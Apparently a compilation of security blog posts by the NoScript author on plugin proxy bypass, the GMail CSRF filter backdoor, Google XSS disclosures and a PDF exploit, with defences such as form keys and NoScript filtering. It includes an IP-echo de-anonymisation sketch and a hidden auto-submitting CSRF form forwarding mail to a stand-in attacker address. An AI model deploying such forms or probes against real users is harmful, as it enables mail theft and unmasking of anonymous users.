The basic concept, not terribly new by the way, is that browser proxy settings cannot be enforced on browser plugins, which happily ignore them in some circumstances, e.g. when establishing a direct TCP socket connection.
So if you’re using a proxy to hide your internet address (like Tor users do), embeddable objects like Java applets can betray you, revealing your real identity to advertisers spying on your habits or, worse, to the police of a repressive state.
An ActionScript object is used to bypass the browser's proxy settings and connect to a tiny server written in Perl, which listens on port 9999 and echoes the client's IP.
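The server side of this demonstration is trivial to reproduce. The post describes it as a tiny Perl script; the following is an equivalent sketch in Python (port 9999 comes from the description above, everything else is my own illustration):

```python
import socket
import threading

# Server side: the tiny "echo the client's IP" listener described in the post.
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srv.bind(("127.0.0.1", 9999))  # port 9999, as in the post
srv.listen(1)

def serve_once():
    conn, (client_ip, _client_port) = srv.accept()
    conn.sendall(client_ip.encode())  # echo back the client's real address
    conn.close()

t = threading.Thread(target=serve_once)
t.start()

# Client side: what a plugin's direct TCP socket does, never consulting
# the proxy configured in the browser.
cli = socket.create_connection(("127.0.0.1", 9999), timeout=5)
real_ip = cli.recv(64).decode()
cli.close()
t.join()
srv.close()

print(real_ip)  # the address the attacker learns: here "127.0.0.1"
```

Since the plugin opens the socket itself, the proxy (Tor or otherwise) never sees this traffic, and the server logs the victim's real address.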
The victim must visit a malicious web page: the most likely scenarios are clicking an external link from an incoming message or surfing porn while checking email from time to time.
The malicious web site forges a POST request to GMail's "Create Filter" wizard, possibly using an invisible auto-submitting form, to build a filter which forwards incoming messages to a mail recipient owned by the attacker.
Since the user is already authenticated, her session cookie is sent along with the forged request and the GMail filter gets silently implanted, with all the output hidden inside an IFRAME.
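For illustration, this is how such an invisible auto-submitting form is typically assembled. The endpoint and field names below are hypothetical placeholders, not the real "Create Filter" parameters, which I'm deliberately not reproducing:

```python
# Sketch of the attacker's page: a hidden form that fires a cross-site POST
# as soon as the page loads, with the response swallowed by an invisible
# IFRAME. TARGET and FIELDS are made-up stand-ins, not GMail's real ones.
TARGET = "https://mail.example.com/createfilter"
FIELDS = {"match_from": "", "forward_to": "attacker@evil.example"}

inputs = "\n".join(
    f'<input type="hidden" name="{name}" value="{value}">'
    for name, value in FIELDS.items()
)

malicious_page = f"""<html><body>
<iframe name="sink" style="display:none"></iframe>
<form id="csrf" action="{TARGET}" method="POST" target="sink">
{inputs}
</form>
<script>document.getElementById("csrf").submit();</script>
</body></html>"""

print(malicious_page)
```

The victim sees nothing: the form is invisible, the submission is automatic, and the server's response lands in the hidden IFRAME.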
The new GMail filter now acts as a persistent backdoor stealing incoming messages, and it can go unnoticed forever unless the victim is a power GMail user who creates or edits her own filters from time to time: they are buried deep in the "Settings" user interface, and I, for instance, never saw them until yesterday!
Very clever and very dangerous.
As I said, this surely counts as a 0day public full disclosure, even though pdp omitted an explicit PoC. How many of us, given minimal web coding experience, would be unable to build a working exploit from the info above?
As usual, now that it's been publicly disclosed, this vulnerability is being patched very quickly by the great Google development crew.
Nonetheless, many other holes of this kind are still around. That's why CSRF is called "The Sleeping Giant": some web coders still need to learn how to fix or prevent these flaws, and users surely want to know how to protect themselves.
1. Web Developers
Please use form keys!
Generate a random identifier (form key) every time you display a form meant to be submitted by authenticated users only.
Echo your key as a hidden field of the form and bind its value to the user session data kept on the server side.
As soon as the form is submitted, compare the returned key with the one stored in session data: if they don't match, throw away the request because it is probably forged.
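A minimal sketch of the three steps above, in Python (names like `SESSIONS` and `issue_form_key` are mine, not from any particular framework):

```python
import secrets
import hmac

SESSIONS = {}  # server-side session store: session_id -> session data

def issue_form_key(session_id):
    """Step 1-2: generate a random form key and bind it to the session.

    Echo the returned value as a hidden <input> in the form.
    """
    key = secrets.token_hex(16)
    SESSIONS.setdefault(session_id, {})["form_key"] = key
    return key

def check_form_key(session_id, submitted_key):
    """Step 3: on submit, compare the returned key with the stored one."""
    expected = SESSIONS.get(session_id, {}).get("form_key")
    if expected is None or not hmac.compare_digest(expected, submitted_key):
        return False  # probably forged: throw the request away
    del SESSIONS[session_id]["form_key"]  # one-time use
    return True

sid = "user-session-123"
key = issue_form_key(sid)
assert check_form_key(sid, key)            # legitimate submission accepted
assert not check_form_key(sid, key)        # replay rejected (key consumed)
assert not check_form_key(sid, "0" * 32)   # forged request rejected
```

A forging site cannot read the key bound to the victim's session, so its request fails the comparison; `hmac.compare_digest` avoids leaking the key through timing differences.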
The above is a simple yet effective anti-CSRF technique. It will work fine unless a further Cross-Site Scripting (XSS) vulnerability is present too, allowing the attacker to read your form key on the fly and forge a seemingly valid request.
2. Web Users
This GMail incident proves how even the best trained web developer in the world can fail at implementing CSRF countermeasures.
Most of the existing literature about XSS and CSRF will tell you that poor users can do nothing to protect themselves from these attacks, but this is blatantly false.
A quite radical, not very usable but effective approach would be using a different browser (or a different profile, if you use Mozilla derivatives) for each "sensitive" web site you access, forcing yourself not to follow any external link nor browse any other site while logged in.
Anyway, if you prefer not to make your life miserable by spawning multiple browsers and scanning every single link with a magnifying lens, your answer is, once again, Firefox + NoScript (sorry to sound repetitive, but that’s it).
An attack like this is trivial to mount when scripting is enabled, but just impossible if malicious scripts are blocked by NoScript.
The obvious objection, raised for instance by both pdp and Adrian Pastor at GNUCITIZEN, is that a CSRF attack does not strictly require JavaScript.
True, but NoScript effectively defeats this attack as well!
It certainly does, but NoScript actually enhances browser security in several other ways.
A very incomplete list:
It prevents malformed URIs from exploiting buggy URI handlers, i.e. the foundation of many cross-application exploits discovered by Billy Rios, Nate McFeters and Thor Larholm.
It implements the most advanced and effective anti-XSS protection available on the client side.
Its request filtering also provides an effective defense against CSRF of the kind affecting GMail: in fact, NoScript intercepts POST requests sent from untrusted origins to trusted sites and strips out their payloads.
This means that, even if the attacker exploits a scriptless vector to launch his POST CSRF through social engineering, NoScript users are still safe as long as the malicious site is not explicitly whitelisted.
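As a toy model (not NoScript's actual code), the stripping policy described above can be expressed like this, assuming we can see each request's origin host, destination host, and method:

```python
TRUSTED = {"mail.google.com"}  # the user's whitelist of trusted sites

def filter_request(origin_host, dest_host, method, body):
    """Toy model of the policy: POSTs sent from untrusted origins to
    trusted sites get their payloads stripped; everything else passes."""
    cross_site = origin_host != dest_host
    untrusted_origin = origin_host not in TRUSTED
    if method == "POST" and cross_site and untrusted_origin and dest_host in TRUSTED:
        return method, None  # payload stripped: the forged request is defanged
    return method, body      # plain hyperlinking (CSR) is left untouched

# A scriptless CSRF attempt from a malicious page loses its payload:
assert filter_request("evil.example", "mail.google.com", "POST", b"create-filter")[1] is None
# A legitimate same-site POST goes through unchanged:
assert filter_request("mail.google.com", "mail.google.com", "POST", b"create-filter")[1] == b"create-filter"
# Cross-site GETs (ordinary links) are not affected at all:
assert filter_request("evil.example", "mail.google.com", "GET", None)[1] is None
```

Note how the policy only bites on the dangerous combination: a state-changing method, crossing site boundaries, from a site the user never chose to trust.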
Giorgio, sounds good, but doesn’t that break things?
I mean, CSRF is one of the most fundamental Web characteristics.
Disabling it might be OK for people like us, but for the general population, that is a no go!
Petko, my friend,
The very foundation of the Web is CSR (Cross Site Requests, AKA Hyperlinking), not CSRF (Cross Site Request Forgery) which is an unwanted side effect of bad coding practices.
RFC 2616, defining HTTP (hence, in a certain sense, the Web itself), clearly states that GET requests (the ones we generate by following hyperlinks or submitting a search form) should be "safe", i.e. should not modify the receiving system, while POST is reserved for requests which cause a permanent change. NoScript just prevents untrusted sites from modifying data held by trusted sites, and this looks like Pure Good™: why would you want the contrary?
Even if you actually wanted the contrary, you can either use the "Unsafe reload" command, available whenever a request is filtered by NoScript, or permanently configure some sites of your choice as unfiltered recipients of unsafe requests by listing them in NoScript Options/Advanced/XSS/Exceptions.
The NoScript feature we're talking about has been in place for more than six months now.
I guess it’s transparent enough if security researchers like you, Adrian or .mario — people “like us”, much more attentive to what happens inside their browsers than “the general population” — did not even notice it… ;)
Not a great month for Google security.
In the past 3 days, three interesting disclosures have been published:
Google Search Appliance XSS discovered by MustLive, affecting almost 200,000 paying customers of the outsourced search engine and their users: this Google dork showed 196,000 results at the time of disclosure, now dropped to 188,000. Fear effect?
Billy Rios and Nate McFeters revealed the gory details of their already announced Picasa exploit, leveraging a clever combo of XSS, Cross-Application Request Forgery, Flash same-domain policy evasion and URI handler weakness exploitation to steal your private pictures, straight from your local hard disk, just by visiting a malicious web page.
Finally, the simplest yet most impressive one, because of the huge number of users involved: beford decided to launch his new blog by disclosing a Google Polls XSS which, thanks to the (too) smart "widget reuse" allowing Google to integrate the same functionality across multiple services, can be used to attack Search, Blogspot, Groups and, in the most dramatic exploitation scenario, GMail:
For such an attack to be successful, the victim just needs to visit a malicious website while logged into Google, e.g. by following a link from an incoming message (unless she's got anti-XSS protection).
update — a few hours after I released the first version of this article, I heard of another Google-outsourced vulnerability, an Urchin Login XSS disclosed by GNUCITIZEN's Adrian Pastor, which could compromise local Google Analytics installations. Its severity may vary depending on how Urchin is installed (e.g. on a different domain than your main site), but the provided proof of concept is quite interesting because it shows an actual credential theft in action, rather than the usual, boring alert() box. Not that a more spectacular example proves anything new about the dangers of XSS, but some people just don't believe until they can see with their own eyes.
These vulnerabilities are surely being fixed at top speed, since Google is one of the most reactive organizations in this fight, but they're nonetheless disturbing because they hit the main player on the field, with the largest user base on the web: that alone makes incidents of this kind inevitable.
How many vulnerabilities like these just go undisclosed and unpatched, yet exploited by unethical crackers?
In Gareth Heyes‘ words,
This proves everything is insecure, there are just degrees of insecurity.
Talking about XSS, if you’re an end user and you don’t like to stay at the very bottom of the insecurity food chain, you’d better use Firefox with NoScript — but that’s your choice, of course. ;)
The Google Search Appliance starts at $30,000, whereas the Mini starts at $1,995.
This means that about 196,000 web sites, many of them belonging to very important universities and other public bodies, are willing to pay to put their data and their users at risk.
Last time I checked, putting up a self-hosted search engine was not a terribly hard task, whether you prefer Java, PHP or just plain CGI.
When you discover your own web site is broken, do you really want to depend on someone else for a fix?
Adobe Acrobat/Reader PDF documents can be used to compromise your Windows box. Completely!!! Invisibly and unwillingly!!! All it takes is to open a PDF document or stumble across a page which embeds one.
I've got no problem believing his words, since the stuff we keep calling "documents" became containers for all kinds of executable code a long time ago, either intentionally (script embedding) or by accident (buffer overflows, often due to an overly complex format driven by creeping featurism).
I (like many people, I guess) do have problems with his suggested work-around:
My advise for you is not to open any PDF files (locally or remotely).
This is something no business can afford, plain and simple.
The real fix would be vendors stopping these crazy mixes of data and code, but it's something they don't even seem to be considering.
So, how can we mitigate risks of this kind, which surely won't go away even when Adobe fixes this specific PDF issue?
OK, I'm obviously biased here, but did you ever notice the NoScript Options/Plugins panel? It provides quite a flexible way to block Java, Flash, Silverlight and all the other plugins such as Acrobat Viewer, Windows Media Player and QuickTime, just to name the ones featured in pdp's research.
If you check all the checkboxes but the last (IFRAMEs), all types of plugin-handled, potentially dangerous content will be blocked by default when coming from unknown (and therefore untrusted) sites.
You’ll get a nice placeholder with the NoScript logo instead: you just click it, and you activate the content on the fly if you deem it’s trustworthy.
If you're paranoid like me, you may want to trade some usability for maximum security and also check the "Apply these restrictions to trusted sites too" option, which mandates on-demand activation everywhere.
I heard someone saying
security × usability = K
If it's true (and I hope some day it won't necessarily be), NoScript tries hard to pump that K up.